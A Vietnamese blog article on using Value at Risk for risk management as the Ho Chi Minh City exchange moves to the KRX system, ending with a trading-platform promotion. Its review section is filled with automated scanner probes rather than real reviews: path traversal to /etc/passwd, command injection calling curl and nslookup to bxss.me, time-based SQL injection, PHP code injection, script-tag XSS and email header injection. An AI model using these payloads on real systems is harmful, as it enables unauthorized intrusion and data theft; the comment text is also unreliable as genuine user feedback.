Value at Risk: “Lá chắn” không thể thiếu khi thị trường Việt Nam bước vào kỷ nguyên KRX

03/05/2025

1,752 lượt đọc

1. Vì sao quản trị rủi ro đột nhiên “nóng” hơn bao giờ hết?

Từ 05 / 05 / 2025, Sở Giao dịch Chứng khoán TP HCM chính thức đưa hệ thống công nghệ KRX vào vận hành. Cùng lúc, hàng loạt cơ chế mới như giao dịch T+0, bán khống, trung tâm bù trừ đối tác trung tâm (CCP) và rút ngắn quy trình thanh toán sẽ được áp dụng. Giới chuyên môn coi đây là “bước ngoặt” quan trọng giúp Việt Nam tiến gần hơn tới mục tiêu nâng hạng thị trường mới nổi.

Nhưng mọi tiện ích đều có mặt trái: tốc độ khớp lệnh nhanh hơn đồng nghĩa rủi ro thua lỗ cũng xảy ra nhanh hơn. Đòn bẩy cao (margin + bán khống) phóng đại biến động. Khi CCP tái tính ký quỹ trong ngày, chỉ cần một cú giảm giá đột ngột, nhà đầu tư thiếu kỷ luật rất dễ rơi vào “vòng xoáy margin call”.

2. VaR – Khái niệm tưởng học thuật nhưng cực thực dụng

Value at Risk (VaR) trả lời câu hỏi: “Trong khung thời gian X với mức tin cậy Y %, danh mục có thể lỗ tối đa bao nhiêu?” Thay vì cảm tính “khoảng vài phần trăm NAV”, VaR đưa ra một con số cụ thể gắn cùng mức xác suất, giúp mọi bộ phận – giao dịch, quản trị rủi ro, lãnh đạo – cùng nói chung một ngôn ngữ.

  1. VaR 1 ngày, 99 % của danh mục 100 tỷ đồng bằng 3 tỷ đồng nghĩa là: 99 % khả năng ngày mai danh mục sẽ không bốc hơi quá 3 tỷ.
  2. Nhưng 1 % hi hữu vẫn có thể xảy ra; muốn biết “lỡ vượt VaR thì lỗ tới đâu”, ta dùng thêm Expected Shortfall (ES).

3. Ba cách ước tính VaR: ưu – nhược và ứng dụng thực tế

Phương phápKhi nào nên dùngĐiểm mạnhĐiểm cần lưu ý
Historical SimulationDanh mục blue‑chip, dữ liệu lịch sử dàyÍt giả định, bám sát giá quá khứThị trường đổi “regime” dễ đánh giá thiếu tail‑risk
Variance–Covariance (Parametric)Cần kết quả nhanh (Excel), danh mục ổn địnhTính gọn nhẹ; tiện kết hợp ma trận hiệp phương saiGiả định lợi suất “đẹp”; đuôi phân phối béo sẽ làm VaR thiếu thận trọng
Monte Carlo SimulationDanh mục đòn bẩy, phái sinh, beta caoLinh hoạt, mô phỏng nhiều kịch bản chưa từng xuất hiệnĐòi hỏi dữ liệu, mô hình xác suất và công suất tính toán

Lưu ý riêng với KRX: sự xuất hiện của T+0, bán khống sẽ làm lợi suất ngày “béo đuôi” hơn; nhà đầu tư nắm phái sinh hoặc cổ phiếu biến động mạnh nên ưu tiên Monte Carlo hoặc ít nhất là Historical Simulation kết hợp kiểm tra tail‑risk.

4. Xây dựng hệ sinh thái VaR “sống” trong môi trường KRX

  1. Dữ liệu và hạ tầng
  2. Thu thập tối thiểu 250 phiên (≈ 1 năm) cho tính VaR ngày; thêm dữ liệu phút hoặc tick để tính VaR nội phiên.
  3. Chuẩn hóa dữ liệu: loại bỏ giao dịch thỏa thuận lớn bất thường, chỉnh giá sau quyền.
  4. Quy trình cảnh báo tự động
  5. Thiết lập ngưỡng VaR = 5 % NAV đối với danh mục cổ phiếu; 3 % NAV nếu dùng margin trên 100 %.
  6. Hệ thống cảnh báo khi VaR tiệm cận 80 % ngưỡng; vượt ngưỡng sẽ khóa lệnh mua, yêu cầu hạ đòn bẩy hoặc mở hedge VN30F.
  7. Stress Test hằng tuần
  8. Áp dụng kịch bản “thị trường giảm 7 % trong 30 phút” (tương đương một phiên bán tháo cuối 2022) để đo VaR + ES.
  9. Giả lập tình huống thanh khoản cạn: giảm 30 % khối lượng khớp, cộng trượt giá 0,5 % mỗi giao dịch, xem danh mục có vượt “vùng đỏ” không.
  10. Ba tuyến phòng thủ
  11. Front Office: trader bắt buộc kiểm tra VaR trước khi đặt lệnh lớn.
  12. Middle Office: đo VaR/ES mỗi 15 phút cho tài khoản đòn bẩy cao.
  13. Back Office: theo dõi hệ số an toàn ký quỹ CCP, bảo đảm tiền nộp bổ sung sẵn sàng nếu VaR bật tăng bất thường.

5. Tình huống điển hình: danh mục 10 tỷ đồng, 5 mã VN30

Trước khi KRX chạy: VaR 1 ngày 99 % ~150 triệu (1,5 % NAV).

Ba tuần thử nghiệm mô phỏng T+0 & short selling: biên độ lợi suất ngày tăng 25 %, tương quan nội phiên thắt chặt → VaR vọt lên 190 triệu (1,9 % NAV).

Chủ tài khoản đặt “ngưỡng đau tim” 170 triệu. Có hai khả năng:

  1. Giảm margin: hạ vay xuống 50 % → VaR giảm còn ~155 triệu, danh mục an toàn.
  2. Giữ margin nhưng mở vị thế bán VN30F tương đương 20 % NAV → lợi suất danh mục và VN30F âm thuận chiều, VaR giảm ~18 %.

Nhờ VaR “phát hiện sớm”, tài khoản tránh bị call ký quỹ trong ngày KRX go‑live khi thị trường rung mạnh phiên sáng.

6. Các “bẫy” VaR thường gặp trên thị trường Việt Nam

  1. Dữ liệu thiếu khủng hoảng: chuỗi giá 2023–2024 khá êm so với cú sốc 2020; lấy dữ liệu quá ngắn dễ “ru ngủ” VaR.
  2. Thanh khoản đảo chiều nhanh: trong phiên hoảng loạn, phí trượt giá tăng và lệnh bán lớn khớp chậm. VaR không tự động tính phí đó nếu người dùng không cộng thêm “haircut” thanh khoản.
  3. “Đê bê tông” tâm lý: VaR chỉ là con số; kỷ luật cắt lỗ, giảm margin mới quyết định sống còn.

7. Lộ trình gợi ý cho ba nhóm nhà đầu tư

NhómViệc cần làm ngayMốc 3 thángMốc 6–12 tháng
Cá nhân dùng marginCài đặt bảng tính VaR/ES cuối ngàyTheo dõi VaR nội phiên trên app CKLiên kết app với API dữ liệu phút để tự động giảm vị thế khi VaR vượt ngưỡng
Công ty chứng khoán tự doanhGom dữ liệu tick, kịch bản stressTự động tính VaR/ES 15 phút, cảnh báo phòng giao dịchKết hợp VaR với mô hình phân bổ vốn Risk‑Adjusted Return, báo cáo SSC
Quỹ mở/quỹ hưu tríThiết lập limit VaR theo điều lệ quỹBack‑test VaR các giai đoạn 2018, 2020, 2022Xây dựng dashboard VaR + ES + đo độ nhạy thanh khoản, báo cáo nhà đầu tư định kỳ

8. Thay lời kết

KRX mở ra một sân chơi nhanh, sâu, rộng hơn – đồng thời đặt ra thử thách lớn về kỷ luật quản trị rủi ro. VaR, nếu được tính đúng cách, nuôi bằng dữ liệu sạch và gắn với cơ chế hành động rõ ràng, sẽ trở thành “lá chắn” cần thiết.

Đừng coi VaR là phép toán chết; hãy biến nó thành hệ thống cảnh báo sống: báo hiệu, phản hồi, thích ứng. Khi đó, dù thị trường có đổi mới đến đâu, tài khoản của bạn vẫn ở thế chủ động – và lợi nhuận bền vững sẽ là phần thưởng xứng đáng cho sự chuyên nghiệp

Hãy xây dựng và kiểm thử chiến lược giao dịch phái sinh của bạn trên nền tảng QMTRADE trước khi sử dụng tiền thật để tránh những rủi ro không đáng có.

Value at Risk
Chia sẻ bài viết

Đánh giá

(181,207)

331 Đánh giá

181,207 / 5

5

271

4

0

3

0

2

0

1

5

ubaTaeCJ

'"()

555

ubaTaeCJ

@

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555 bcc:[email protected]

ubaTaeCJ

tes****@example.com

[email protected]> bcc:[email protected]

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com bcc:0.4117-6624.4117.7467d.20326.2

555

ubaTaeCJ

[email protected]> bcc:0.4117-6625.4117.7467d.20326.2

555

ubaTaeCJ bcc:[email protected]

tes****@example.com

555

ubaTaeCJ

tes****@example.com

../../../../../../../../../../../../../../etc/passwd

[email protected]> bcc:[email protected]

tes****@example.com

555

ubaTaeCJ

tes****@example.com

ubaTaeCJ

tes****@example.com

../../../../../../../../../../../../../../windows/win.ini

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

12345'"\'\");|]*

ubaTaeCJ

tes****@example.com

file:///etc/passwd

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

../555

ubaTaeCJ

tes****@example.com

555<esi:include src="http://bxss.me/rpb.png"/>

ubaTaeCJ

../../../../../../../../../../../../../../etc/passwd

555

ubaTaeCJ

12345'"\'\");|]*

555

ubaTaeCJ

tes****@example.com<esi:include src="http://bxss.me/rpb.png"/>

555

ubaTaeCJ

../../../../../../../../../../../../../../windows/win.ini

555

ubaTaeCJ<esi:include src="http://bxss.me/rpb.png"/>

tes****@example.com

555

ubaTaeCJ

file:///etc/passwd

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

${9999990+10000101}

ubaTaeCJ

tes****@example.com

echo ptkyoo$()\ mieiou\nz^xyu||a #' &echo ptkyoo$()\ mieiou\nz^xyu||a #|" &echo ptkyoo$()\ mieiou\nz^xyu||a #

ubaTaeCJ

../*******@example.com

555

ubaTaeCJ

${10000334+9999779}

555

12345'"\'\");|]*

tes****@example.com

555

ubaTaeCJ

tes****@example.com

&echo aclnmu$()\ smnbhw\nz^xyu||a #' &echo aclnmu$()\ smnbhw\nz^xyu||a #|" &echo aclnmu$()\ smnbhw\nz^xyu||a #

../../../../../../../../../../../../../../etc/passwd

tes****@example.com

555

${9999076+10000378}

tes****@example.com

555

response.write(9215170*9814959)

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555&echo futiyo$()\ wspyuc\nz^xyu||a #' &echo futiyo$()\ wspyuc\nz^xyu||a #|" &echo futiyo$()\ wspyuc\nz^xyu||a #

../../../../../../../../../../../../../../windows/win.ini

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

|echo eqmqnj$()\ nlrbjl\nz^xyu||a #' |echo eqmqnj$()\ nlrbjl\nz^xyu||a #|" |echo eqmqnj$()\ nlrbjl\nz^xyu||a #

file:///etc/passwd

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555|echo mjarhw$()\ kbpwwo\nz^xyu||a #' |echo mjarhw$()\ kbpwwo\nz^xyu||a #|" |echo mjarhw$()\ kbpwwo\nz^xyu||a #

ubaTaeCJ

tes****@example.com

555

NUZOdUtxVjM=

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

(nslookup -q=cname hitxgyzjknrbff74f1.bxss.me||curl hitxgyzjknrbff74f1.bxss.me))

../ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

$(nslookup -q=cname hitgnczxxzymha2858.bxss.me||curl hitgnczxxzymha2858.bxss.me)

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

ubaTaeCJ

tes****@example.com

&nslookup -q=cname hitgfrpqdbilxeb57e.bxss.me&'\"`0&nslookup -q=cname hitgfrpqdbilxeb57e.bxss.me&`'

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

'"

ubaTaeCJ

tes****@example.com

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs

ubaTaeCJ

tes****@example.com

&(nslookup -q=cname hituvhkyavdci89de2.bxss.me||curl hituvhkyavdci89de2.bxss.me)&'\"`0&(nslookup -q=cname hituvhkyavdci89de2.bxss.me||curl hituvhkyavdci89de2.bxss.me)&`'

ubaTaeCJ

tes****@example.com

)

ubaTaeCJ

tes****@example.com

response.write(9511822*9789002)

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

<!--

ubaTaeCJ

tes****@example.com

Http://bxss.me/t/fit.txt

ubaTaeCJ

tes****@example.com

|(nslookup -q=cname hitzqvbzdhyxqdf841.bxss.me||curl hitzqvbzdhyxqdf841.bxss.me)

ubaTaeCJ

tes****@example.com

!(()&&!|*|*|

ubaTaeCJ

tes****@example.com

'+response.write(9511822*9789002)+'

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

'"

555

ubaTaeCJ

tes****@example.com

http://bxss.me/t/fit.txt?.jpg

ubaTaeCJ

tes****@example.com

`(nslookup -q=cname hitptgoixcmkdb335a.bxss.me||curl hitptgoixcmkdb335a.bxss.me)`

ubaTaeCJ

tes****@example.com

^(#$!@#$)(()))******

ubaTaeCJ

tes****@example.com

"+response.write(9511822*9789002)+"

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

<!--

555

ubaTaeCJ

tes****@example.com

/etc/shells

ubaTaeCJ

tes****@example.com

;(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)|(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)&(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)

ubaTaeCJ

)

555

ubaTaeCJ

response.write(9363672*9618060)

555

'"

tes****@example.com

555

ubaTaeCJ

tes****@example.com

c:/windows/win.ini

ubaTaeCJ

echo nydskr$()\ xnolcq\nz^xyu||a #' &echo nydskr$()\ xnolcq\nz^xyu||a #|" &echo nydskr$()\ xnolcq\nz^xyu||a #

555

ubaTaeCJ

!(()&&!|*|*|

555

ubaTaeCJ

'+response.write(9363672*9618060)+'

555

<!--

tes****@example.com

555

ubaTaeCJ

tes****@example.com

bxss.me

ubaTaeCJ

&echo qaevrk$()\ cxacdu\nz^xyu||a #' &echo qaevrk$()\ cxacdu\nz^xyu||a #|" &echo qaevrk$()\ cxacdu\nz^xyu||a #

555

ubaTaeCJ

^(#**@#$)(()))******

555

ubaTaeCJ

"+response.write(9363672*9618060)+"

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.com

555

ubaTaeCJ

tes****@example.com&echo fyfadt$()\ hsdukp\nz^xyu||a #' &echo fyfadt$()\ hsdukp\nz^xyu||a #|" &echo fyfadt$()\ hsdukp\nz^xyu||a #

555

)

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs

555

ubaTaeCJ

|echo zggwpb$()\ ddqdoq\nz^xyu||a #' |echo zggwpb$()\ ddqdoq\nz^xyu||a #|" |echo zggwpb$()\ ddqdoq\nz^xyu||a #

555

ubaTaeCJ

tes****@example.com

HttP://bxss.me/t/xss.html?%00

!(()&&!|*|*|

tes****@example.com

555

'+response.write(9215170*9814959)+'

tes****@example.com

555

ubaTaeCJ

Http://bxss.me/t/fit.txt

555

ubaTaeCJ

tes****@example.com|echo igdvok$()\ klquza\nz^xyu||a #' |echo igdvok$()\ klquza\nz^xyu||a #|" |echo igdvok$()\ klquza\nz^xyu||a #

555

ubaTaeCJ

tes****@example.com

bxss.me/t/xss.html?%00

^(#$!@#$)(()))******

tes****@example.com

555

"+response.write(9215170*9814959)+"

tes****@example.com

555

ubaTaeCJ

http://bxss.me/t/fit.txt?.com

555

ubaTaeCJ

(nslookup -q=cname hithoaljbaova4b581.bxss.me||curl hithoaljbaova4b581.bxss.me))

555

ubaTaeCJ

HttP://bxss.me/t/xss.html?%00

555

ubaTaeCJ

tes****@example.com

"+"A".concat(70-3).concat(22*4).concat(115).concat(79).concat(109).concat(71)+(require"socket" Socket.gethostbyname("hitot"+"aldqgbelddd05.bxss.me.")[3].to_s)+"

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

/etc/shells

555

ubaTaeCJ

$(nslookup -q=cname hittkugnyzdkgdaa16.bxss.me||curl hittkugnyzdkgdaa16.bxss.me)

555

ubaTaeCJ

bxss.me/t/xss.html?%00

555

ubaTaeCJ

tes****@example.com

'+'A'.concat(70-3).concat(22*4).concat(114).concat(77).concat(120).concat(74)+(require'socket' Socket.gethostbyname('hithm'+'ptntwali40ac7.bxss.me.')[3].to_s)+'

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

review-store

ubaTaeCJ

c:/windows/win.ini

555

ubaTaeCJ

&nslookup -q=cname hitrpukfaavmmd654a.bxss.me&'\"`0&nslookup -q=cname hitrpukfaavmmd654a.bxss.me&`'

555

HttP://bxss.me/t/xss.html?%00

tes****@example.com

555

ubaTaeCJ

"+"A".concat(70-3).concat(22*4).concat(115).concat(87).concat(122).concat(82)+(require"socket" Socket.gethostbyname("hitsf"+"nqitjdcl55659.bxss.me.")[3].to_s)+"

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

review-store

ubaTaeCJ

bxss.me

555

ubaTaeCJ

&(nslookup -q=cname hitzuefuyujfhcb7fb.bxss.me||curl hitzuefuyujfhcb7fb.bxss.me)&'\"`0&(nslookup -q=cname hitzuefuyujfhcb7fb.bxss.me||curl hitzuefuyujfhcb7fb.bxss.me)&`'

555

bxss.me/t/xss.html?%00

tes****@example.com

555

ubaTaeCJ

'+'A'.concat(70-3).concat(22*4).concat(102).concat(83).concat(101).concat(87)+(require'socket' Socket.gethostbyname('hitpv'+'sntioxax94ba5.bxss.me.')[3].to_s)+'

555

ubaTaeCJ

tes****@example.com

review-store/.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

tes****@example.com

555

ubaTaeCJ

|(nslookup -q=cname hitzwpehlaudd9c63d.bxss.me||curl hitzwpehlaudd9c63d.bxss.me)

555

ubaTaeCJ

tes****@example.com

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(76).concat(121).concat(67)+(require"socket" Socket.gethostbyname("hitdo"+"ndorhnbb1487d.bxss.me.")[3].to_s)+"

tes****@example.com

555

ubaTaeCJ

tes****@example.com

xfs.bxss.me

ubaTaeCJ

review-store

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs

tes****@example.com

555

ubaTaeCJ

`(nslookup -q=cname hituiytpylowm1cfe6.bxss.me||curl hituiytpylowm1cfe6.bxss.me)`

555

ubaTaeCJ

tes****@example.com

555

'+'A'.concat(70-3).concat(22*4).concat(116).concat(73).concat(97).concat(87)+(require'socket' Socket.gethostbyname('hitfj'+'uhfrwgvu54c5d.bxss.me.')[3].to_s)+'

tes****@example.com

555

ubaTaeCJ

xfs.bxss.me

555

ubaTaeCJ

review-store

555

Http://bxss.me/t/fit.txt

tes****@example.com

555

ubaTaeCJ

;(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)|(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)&(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)

555

ubaTaeCJ

tes****@example.com

555

xfs.bxss.me

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555'"()&%<zzz><ScRiPt >xNze(9140)</ScRiPt>

ubaTaeCJ

review-store/.

555

http://bxss.me/t/fit.txt?.jpg

tes****@example.com

555

echo repfag$()\ kcpjbq\nz^xyu||a #' &echo repfag$()\ kcpjbq\nz^xyu||a #|" &echo repfag$()\ kcpjbq\nz^xyu||a #

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

review-store

tes****@example.com

555

/etc/shells

tes****@example.com

555

&echo dbhwpf$()\ ypaeaa\nz^xyu||a #' &echo dbhwpf$()\ ypaeaa\nz^xyu||a #|" &echo dbhwpf$()\ ypaeaa\nz^xyu||a #

tes****@example.com

555

ubaTaeCJ

tes****@example.com

'"()&%<zzz><ScRiPt >xNze(9320)</ScRiPt>

review-store

tes****@example.com

555

c:/windows/win.ini

tes****@example.com

555

ubaTaeCJ&echo gmnufd$()\ qlonta\nz^xyu||a #' &echo gmnufd$()\ qlonta\nz^xyu||a #|" &echo gmnufd$()\ qlonta\nz^xyu||a #

tes****@example.com

555

review-store/.

tes****@example.com

555

ubaTaeCJ

tes****@example.com

5559545214

bxss.me

tes****@example.com

555

|echo nusbbp$()\ kmywnr\nz^xyu||a #' |echo nusbbp$()\ kmywnr\nz^xyu||a #|" |echo nusbbp$()\ kmywnr\nz^xyu||a #

tes****@example.com

555

ubaTaeCJ

tes****@example.com

'.gethostbyname(lc('hitmz'.'hhjvmgryec7a4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(78).chr(117).chr(79).'

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ|echo pogdyc$()\ umfyvd\nz^xyu||a #' |echo pogdyc$()\ umfyvd\nz^xyu||a #|" |echo pogdyc$()\ umfyvd\nz^xyu||a #

tes****@example.com

555

ubaTaeCJ

tes****@example.com'"()&%<zzz><ScRiPt >xNze(9238)</ScRiPt>

555

ubaTaeCJ

tes****@example.com

".gethostbyname(lc("hitoz"."hothvuujba30f.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(75).chr(113).chr(74)."

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

(nslookup -q=cname hitlvaxxnbxao967f6.bxss.me||curl hitlvaxxnbxao967f6.bxss.me))

tes****@example.com

555

ubaTaeCJ

'.gethostbyname(lc('hitma'.'abzootue1cc57.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(85).chr(112).chr(81).'

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

'"()&%<zzz><ScRiPt >xNze(9568)</ScRiPt>

555

$(nslookup -q=cname hitozasqimwte9d198.bxss.me||curl hitozasqimwte9d198.bxss.me)

tes****@example.com

555

ubaTaeCJ

".gethostbyname(lc("hitsy"."tixmaohm97273.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(73).chr(105).chr(78)."

555

ubaTaeCJ

tes****@example.com

555

&nslookup -q=cname hitnscrvugqfo64516.bxss.me&'\"`0&nslookup -q=cname hitnscrvugqfo64516.bxss.me&`'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

ubaTaeCJ

tes****@example.com9226221

555

'.gethostbyname(lc('hitzh'.'pgqnbzvh1f3be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(89).chr(120).chr(87).'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

&(nslookup -q=cname hitckshgsarqha7441.bxss.me||curl hitckshgsarqha7441.bxss.me)&'\"`0&(nslookup -q=cname hitckshgsarqha7441.bxss.me||curl hitckshgsarqha7441.bxss.me)&`'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

';print(md5(31337));$a='

".gethostbyname(lc("hitwi"."qpvxexita94f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(75).chr(120).chr(71)."

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

|(nslookup -q=cname hitkyouzqdpzj1a95f.bxss.me||curl hitkyouzqdpzj1a95f.bxss.me)

tes****@example.com

555

ubaTaeCJ'"()&%<zzz><ScRiPt >xNze(9507)</ScRiPt>

tes****@example.com

555

ubaTaeCJ

tes****@example.com

";print(md5(31337));$a="

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

`(nslookup -q=cname hitirmsvyuxji963f1.bxss.me||curl hitirmsvyuxji963f1.bxss.me)`

tes****@example.com

555

ubaTaeCJ

tes****@example.com

'"()

ubaTaeCJ

tes****@example.com

${@print(md5(31337))}

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555"&&sleep(27*1000)*urtith&&"

'"()&%<zzz><ScRiPt >xNze(9494)</ScRiPt>

tes****@example.com

555

;(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)|(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)&(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555'&&sleep(27*1000)*oysiia&&'

ubaTaeCJ

tes****@example.com

${@print(md5(31337))}\

ubaTaeCJ

tes****@example.com

'.print(md5(31337)).'

ubaTaeCJ9582950

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555'||sleep(27*1000)*ptsbmy||'

ubaTaeCJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555"||sleep(27*1000)*tlzaur||"

ubaTaeCJ

';print(md5(31337));$a='

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

";print(md5(31337));$a="

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

${@print(md5(31337))}

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

${@print(md5(31337))}\

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

'.print(md5(31337)).'

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com'&&sleep(27*1000)*kbvqje&&'

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com"&&sleep(27*1000)*ckmasl&&"

555

';print(md5(31337));$a='

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com'||sleep(27*1000)*pkxqiw||'

555

";print(md5(31337));$a="

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com"||sleep(27*1000)*cbojrd||"

555

${@print(md5(31337))}

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

${@print(md5(31337))}\

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

'.print(md5(31337)).'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

'"()

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ'&&sleep(27*1000)*gvzshi&&'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ"&&sleep(27*1000)*fnkfzc&&"

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ'||sleep(27*1000)*lvqtcj||'

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ"||sleep(27*1000)*absgjf||"

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555*if(now()=sysdate(),sleep(15),0)

ubaTaeCJ

tes****@example.com

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

ubaTaeCJ

tes****@example.com

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

ubaTaeCJ

tes****@example.com

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

ubaTaeCJ

tes****@example.com

555-1; waitfor delay '0:0:15' --

ubaTaeCJ

tes****@example.com

555-1); waitfor delay '0:0:15' --

ubaTaeCJ

tes****@example.com

555-1 waitfor delay '0:0:15' --

ubaTaeCJ

tes****@example.com

555CAfc9ogy'; waitfor delay '0:0:15' --

ubaTaeCJ

tes****@example.com

555-1 OR 449=(SELECT 449 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

555-1) OR 554=(SELECT 554 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

555-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

5555pzjNZIB' OR 986=(SELECT 986 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

555FUb1zWiK') OR 342=(SELECT 342 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

555M13IuE7t')) OR 643=(SELECT 643 FROM PG_SLEEP(15))--

ubaTaeCJ

tes****@example.com

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ubaTaeCJ

tes****@example.com

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

ubaTaeCJ

tes****@example.com

555'"

ubaTaeCJ

tes****@example.com

@@drsFx

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

tes****@example.com

555

ubaTaeCJ

if(now()=sysdate(),sleep(15),0)

555

ubaTaeCJ

tes****@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

ubaTaeCJ

tes****@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

ubaTaeCJ

